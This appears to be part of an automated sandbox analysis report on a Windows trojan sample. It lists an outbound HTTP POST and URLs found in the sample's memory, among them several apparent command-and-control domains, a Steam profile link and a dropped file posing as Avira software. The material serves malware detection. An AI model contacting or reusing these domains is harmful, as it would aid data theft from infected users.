            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://piriform.com/go/app_cc_license_agreementPA
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://piriform.com/go/app_cc_privacy_policy
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://s2.symcb.com0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcb.com/sv.crt0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://sv.symcd.com0&
            Source: AviraOculus.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.piriform.com/ccleaner
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.symauth.com/cps0(
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: http://www.symauth.com/rpa00
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcd
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C10000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/cP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site/hP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BC5000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ballotnwu.site:443/apiprofiles/76561199724331900
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akam
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&l=e
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drawzhotdog.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fragnantbui.shop/apip
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ghostreedmnu.shop/f
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gutterydhowi.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/1
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://offensivedzvju.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recap8
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop//O9
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/7
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/api
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reinforcenh.shop/apiiU
